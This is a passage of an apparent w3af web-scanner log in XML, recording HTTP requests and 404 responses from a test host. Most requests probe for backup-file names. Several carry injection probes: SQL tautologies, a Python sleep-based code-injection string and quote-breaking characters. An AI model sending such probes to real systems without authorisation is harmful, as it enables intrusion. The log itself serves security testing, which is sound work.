                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="370">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="371">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="374">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="375">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="376">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="383">
                <http-request>
                    <status>GET http://10.12.68.43:31337/tq8vr%3C%2F-%3Etq8vr%2F%2Atq8vr%22tq8vrtq8vr%27tq8vrtq8vr%60tq8vrtq8vr+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about tq8vr%3C%2F-%3Etq8vr%2F%2Atq8vr%22tq8vrtq8vr%27tq8vrtq8vr%60tq8vrtq8vr+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='tq8vr%3C%2F-%3Etq8vr%2F%2Atq8vr%22tq8vrtq8vr%27tq8vrtq8vr%60tq8vrtq8vr+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="390">
                <http-request>
                    <status>GET http://10.12.68.43:31337/KOt0rg03 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about KOt0rg03 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='KOt0rg03'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="391">
                <http-request>
                    <status>GET http://10.12.68.43:31337/45%22+OR+%2245%22%3D%2245 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 45%22+OR+%2245%22%3D%2245 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='45%22+OR+%2245%22%3D%2245'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="407">
                <http-request>
                    <status>GET http://10.12.68.43:31337/45%22+AND+%2245%22%3D%2246 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 45%22+AND+%2245%22%3D%2246 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='45%22+AND+%2245%22%3D%2246'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="427">
                <http-request>
                    <status>GET http://10.12.68.43:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="428">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about cake~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='cake~'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="429">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="430">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="431">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="432">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="433">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="434">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="435">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="436">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="437">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27z%270 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%270 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%270'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="439">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="440">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
